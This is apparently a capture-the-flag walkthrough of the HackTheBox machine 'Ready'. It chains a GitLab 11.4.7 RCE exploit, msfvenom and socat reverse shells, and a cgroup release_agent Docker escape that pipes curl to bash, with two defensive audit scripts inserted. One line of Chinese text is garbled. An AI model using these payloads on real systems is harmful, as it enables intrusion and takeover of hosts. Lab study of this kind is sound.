Ready (upgrading to a full shell, container escape)

Service enumeration

Open ports

┌──(root㉿rock)-[~]
└─# nmap -p- --open 10.10.10.220              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 04:24 EDT
Nmap scan report for 10.10.10.220
Host is up (0.030s latency).
Not shown: 61766 closed tcp ports (reset), 3767 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 50.09 seconds

Detailed port information


┌──(root㉿rock)-[~]
└─# nmap -sV -Pn -A -O 10.10.10.220 -p 22,5080
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 04:26 EDT
Nmap scan report for 10.10.10.220
Host is up (0.092s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-title: GitLab is not responding (502)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   ... 10
11  12.36 ms 10.10.10.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.71 seconds

web

robots.txt

User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in

# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw

# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/

The help page confirms the GitLab version as 11.4.7:

http://10.10.10.220:5080/help

Searching for known vulnerabilities: there is an authenticated RCE for this version.

┌──(root㉿kali)-[~/htb/Ready]
└─# searchsploit gitlab 11.4.7
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2)                                                                                                                                                                   | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)                                                                                                                                                 | ruby/webapps/49257.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


Running the exploit reports success, but no reverse shell comes back:

┌──(root㉿kali)-[~/htb/Ready]
└─# python3 49334.py -u chen -p 123456789 -g 'http://10.10.10.220' -l 10.10.16.2 -P 5080
[+] authenticity_token: P6oayybySIHkjN1hOiORE2To2qUsij2zCCWcEwRjr/eJ/UnDoWxn4YF5ZWw9aRBAUenpEHf0nkcnXQAZfSnCew==
[+] Creating project with random name: project2006
[+] Running Exploit
[+] Exploit completed successfully!

Looking at the exploit source, the reverse shell is spawned with nc:

f'nc {local_ip} {local_port} -e /bin/bash'

For security reasons, most Linux distributions ship a netcat without the -e and -c options, so this command does nothing useful on the target.

We first need to prove that the RCE really exists, and only then look for another way to get a shell back.

Change the line above to:

f'wget http://10.10.16.2/any'

Start an HTTP server on Kali and run the exploit again; the incoming GET request proves that the RCE works:

┌──(root㉿kali)-[~/htb/Ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [01/Jul/2022 05:22:07] code 404, message File not found
10.10.10.220 - - [01/Jul/2022 05:22:07] "GET /any HTTP/1.1" 404 -

foothold

Build a payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=4242 -f elf > shell.elf

Start an HTTP server to serve it:

┌──(root㉿kali)-[~/htb/Ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Change the payload in 49334.py to:

wget http://10.10.16.2/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf&&/tmp/shell.elf

If the payload above does not run, try splitting it into three separate executions, one per command.

Trigger the exploit:

┌──(root㉿kali)-[~/htb/Ready]
└─# python3 49334.py -u chen -p 123456789 -g 'http://10.10.10.220' -l 10.10.16.2 -P 5080
[+] authenticity_token: 8IMetc2Ptcb5HXlnRVYTK3YdOhCdLQ39XTrwO2FOjxHBAF+SJbzuwNYB9udD2jQnC1Tlg5oNRNczOisNZa3Aog==
[+] Creating project with random name: project4047
[+] Running Exploit
[+] Exploit completed successfully!

Get user.txt:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.2:4242 
[*] Sending stage (989032 bytes) to 10.10.10.220
[*] Meterpreter session 4 opened (10.10.16.2:4242 -> 10.10.10.220:42282) at 2022-07-18 02:55:05 -0400

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  4096  dir   2022-04-05 08:32:28 -0400  dude

meterpreter > cd dude
meterpreter > ls
Listing: /home/dude
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100551/r-xr-x--x  33    fil   2022-07-18 02:21:48 -0400  user.txt

meterpreter > cat user.txt 
176f5155e3df....

Privilege escalation

Use /bin/bash -i to upgrade to a tty.

A backup folder is found under /opt. The /opt directory is normally empty, so anything found there deserves extra attention; it is often the key to privilege escalation.

A password is found in gitlab.rb:

git@gitlab:/opt/backup$ cat gitlab.rb|grep pass
cat gitlab.rb|grep pass
#### Email account password
# gitlab_rails['incoming_email_password'] = "[REDACTED]"
#     password: '_the_password_of_the_bind_user'
#     password: '_the_password_of_the_bind_user'
#   '/users/password',
#### Change the initial default admin password and shared runner registration tokens.
# gitlab_rails['initial_root_password'] = "password"
# gitlab_rails['db_password'] = nil
# gitlab_rails['redis_password'] = nil
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_shell['http_settings'] = { user: 'username', password: 'password', ca_file: '/etc/ssl/cert.pem', ca_path: '/etc/pki/tls/certs', self_signed_cert: false}
##! `SQL_USER_PASSWORD_HASH` can be generated using the command `gitlab-ctl pg-password-md5 gitlab`
# postgresql['sql_user_password'] = 'SQL_USER_PASSWORD_HASH'
# postgresql['sql_replication_password'] = "md5 hash of postgresql password" # You can generate with `gitlab-ctl pg-password-md5 <dbuser>`
# redis['password'] = 'redis-password-goes-here'
####! **Master password should have the same value defined in
####!   redis['password'] to enable the instance to transition to/from
# redis['master_password'] = 'redis-password-goes-here'
# geo_secondary['db_password'] = nil
# geo_postgresql['pgbouncer_user_password'] = nil
#     password: PASSWORD
###! generate this with `echo -n '$password + $username' | md5sum`
# pgbouncer['auth_query'] = 'SELECT username, password FROM public.pg_shadow_lookup($1)'
#     password: MD5_PASSWORD_HASH
# postgresql['pgbouncer_user_password'] = nil

Note this line:

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
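The grep above shows why a stray copy of gitlab.rb in a backup directory matters: among dozens of commented-out defaults, a single uncommented setting is enough. As an added example (not part of the writeup and not GitLab's own tooling), the script below audits a gitlab.rb-style file for settings whose key names suggest a secret and reports which of them are live, meaning not commented out and not nil or empty, distinguishing plaintext literals from indirections such as File.read; it also produces a redacted copy that is safe to keep in a backup. The sample input is constructed to resemble the grep output, with a placeholder in place of the real SMTP password.

```python
import re

# Constructed sample modelled on the `grep pass` output above; the live SMTP
# value is a placeholder, not the password from the box.
SAMPLE_GITLAB_RB = """\
#### Email account password
# gitlab_rails['incoming_email_password'] = "[REDACTED]"
# gitlab_rails['initial_root_password'] = "password"
# gitlab_rails['db_password'] = nil
gitlab_rails['smtp_password'] = "example-smtp-secret"
# redis['password'] = 'redis-password-goes-here'
gitlab_rails['smtp_enable'] = true
postgresql['sql_user_password'] = nil
gitlab_rails['initial_root_password'] = File.read('/root_pass')
gitlab_rails['smtp_user_name'] = "gitlab@example.com"
"""

# Omnibus settings look like section['key'] = value; comments start with '#'.
SETTING_RE = re.compile(r"^(?P<key>[A-Za-z_]+\['[A-Za-z_]+'\])\s*=\s*(?P<value>.+?)\s*$")
SENSITIVE_RE = re.compile(r"password|secret|token", re.I)
LITERAL_RE = re.compile(r"""(["']).*\1""")
# Values that carry no secret: unset, empty, or already redacted.
PLACEHOLDERS = {"nil", '""', "''", '"[REDACTED]"'}


def _parse_setting(raw):
    """Return (key, value) for an active setting line, else None."""
    line = raw.strip()
    if not line or line.startswith("#"):
        return None          # commented-out defaults are documentation, not config
    m = SETTING_RE.match(line)
    return (m.group("key"), m.group("value")) if m else None


def find_live_secrets(text):
    """List every active setting whose key looks secret-bearing and whose value is set."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = _parse_setting(raw)
        if parsed is None:
            continue
        key, value = parsed
        if not SENSITIVE_RE.search(key) or value in PLACEHOLDERS:
            continue
        # A quoted literal is the secret itself; File.read(...) or ENV[...] only points at it.
        kind = "plaintext" if LITERAL_RE.fullmatch(value) else "indirect"
        findings.append({"line": lineno, "key": key, "kind": kind})
    return findings


def redact(text):
    """Copy of the file with plaintext secret literals replaced, safe to archive."""
    out = []
    for raw in text.splitlines():
        parsed = _parse_setting(raw)
        is_secret = (parsed is not None and SENSITIVE_RE.search(parsed[0])
                     and LITERAL_RE.fullmatch(parsed[1]) and parsed[1] not in PLACEHOLDERS)
        out.append(f'{parsed[0]} = "[REDACTED]"' if is_secret else raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for f in find_live_secrets(SAMPLE_GITLAB_RB):
        print(f"line {f['line']}: {f['key']} ({f['kind']})")
    print(redact(SAMPLE_GITLAB_RB))
```

Run against the sample, the audit reports only two live settings out of ten lines: the plaintext smtp_password and the File.read indirection for initial_root_password. The redacted copy keeps the indirection (it reveals a path, not a secret) and replaces the literal, so a second audit of the redacted file finds nothing in plaintext.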

Trying to escalate, su complains that it must be run from a terminal:

git@gitlab:/tmp$ su root
su root
su: must be run from a terminal
git@gitlab:/tmp$ 

We need to upgrade to a full terminal.

Upgrading to a full shell

(This is actually a method I learned from the OSCP labs.)

Following the method referenced here:

If the target does not have socat, download a static binary from here: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

Kali:

socat file:`tty`,raw,echo=0 tcp-listen:443

Target:

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.187:443

現(xiàn)在我們收到一個(gè)完整的shell,可以執(zhí)行su命令

┌──(root㉿kali)-[~/htb/Ready]
└─# socat file:`tty`,raw,echo=0 tcp-listen:443
git@gitlab:/tmp$ su
Password: 
root@gitlab:/tmp# whoami
root
root@gitlab:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:~# 

But there is no root.txt, because we are inside a container.

Docker escape

Look at docker-compose.yml, the Docker configuration file:

root@gitlab:/opt/backup# cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16

privileged: true means the container runs with every capability and without the usual device and cgroup restrictions, so root inside the container is effectively root on the host.
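As an added example (not part of the writeup and not GitLab's or Docker's own tooling), the script below lints a compose file for exactly the settings that made this escape possible: `privileged: true`, writable or sensitive host bind mounts, and ports published on every interface rather than on 127.0.0.1 as the commented-out lines intended. It uses a hand-written parser for the block-style YAML subset compose files use (maps, lists of scalars, literal `|` blocks; comments and blank lines are dropped), so it needs no third-party module. The sample compose file is an abbreviated copy of the one above.

```python
# Added example: lint the compose settings that let a container reach the host.
# The parser covers the block-style YAML subset compose files use; it is not a
# general YAML parser and does not handle flow style or multi-line list items.

# Constructed sample, abbreviated from the docker-compose.yml shown above.
SAMPLE_COMPOSE = """\
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
"""

# Host paths that hand the container the host's identity or control plane.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/proc", "/sys", "/dev", "/var/run/docker.sock")


def _scalar(text):
    text = text.strip()
    if len(text) >= 2 and text[0] == text[-1] and text[0] in "'\"":
        return text[1:-1]
    return text == "true" if text in ("true", "false") else text


def _parse_block(lines, i, indent):
    """Parse the mapping or sequence whose first line is lines[i]; return (node, next_i)."""
    if lines[i][1].startswith("- "):
        seq = []
        while i < len(lines) and lines[i][0] == indent and lines[i][1].startswith("- "):
            seq.append(_scalar(lines[i][1][2:]))
            i += 1
        return seq, i
    node = {}
    while i < len(lines) and lines[i][0] == indent and not lines[i][1].startswith("- "):
        key, _, rest = lines[i][1].partition(":")
        key, rest = key.strip(), rest.strip()
        i += 1
        if rest == "|":                                  # literal block scalar
            buf = []
            while i < len(lines) and lines[i][0] > indent:
                buf.append(lines[i][1])
                i += 1
            node[key] = "\n".join(buf)
        elif rest == "" and i < len(lines) and lines[i][0] > indent:
            node[key], i = _parse_block(lines, i, lines[i][0])
        else:
            node[key] = _scalar(rest) if rest else None
    return node, i


def parse_compose(text):
    lines = [(len(raw) - len(raw.lstrip(" ")), raw.strip())
             for raw in text.splitlines()
             if raw.strip() and not raw.strip().startswith("#")]
    return _parse_block(lines, 0, lines[0][0])[0] if lines else {}


def _sensitive_host_path(host):
    norm = host.rstrip("/") or "/"
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def lint_compose(text):
    """Return (service, severity, message) tuples for settings that expose the host."""
    findings = []
    for name, svc in (parse_compose(text).get("services") or {}).items():
        svc = svc or {}
        if svc.get("privileged") is True:
            findings.append((name, "high", "privileged: true grants every capability plus raw "
                             "device and cgroup access; use specific cap_add entries instead"))
        for vol in svc.get("volumes") or []:
            host, _, rest = str(vol).partition(":")
            if not host.startswith("/"):
                continue                                 # named volume or project-relative path
            if _sensitive_host_path(host):
                findings.append((name, "high", f"bind mount of sensitive host path {host}"))
            elif "ro" not in rest.split(":")[-1].split(","):
                findings.append((name, "medium", f"writable bind mount of host path {host}"))
        for port in svc.get("ports") or []:
            if str(port).count(":") < 2:                 # no host IP given: bound to 0.0.0.0
                findings.append((name, "low", f"port mapping {port} is published on all interfaces"))
    return findings


if __name__ == "__main__":
    for service, severity, message in lint_compose(SAMPLE_COMPOSE):
        print(f"[{severity}] {service}: {message}")
```

On the sample it reports three findings for the web service: the privileged flag, the writable bind of /opt/user (the host directory that holds user.txt), and the 5080:80 mapping exposed on all interfaces. Replacing `privileged: true` with an explicit cap_add list and restoring the 127.0.0.1 prefix on the port mapping leaves only the bind-mount note.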

Following the method in the referenced article, we can escape from Docker and get a root shell on the host:

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.16.2/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

shell.sh

bash >& /dev/tcp/10.10.16.2/4242 0>&1

Receive the reverse shell:

┌──(root㉿kali)-[~]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.220] 46706
id
uid=0(root) gid=0(root) groups=0(root)
whoami  
root
ls /root
docker-gitlab
ready-channel
root.txt
snap
cat root.txt
ffa185f28f07941...
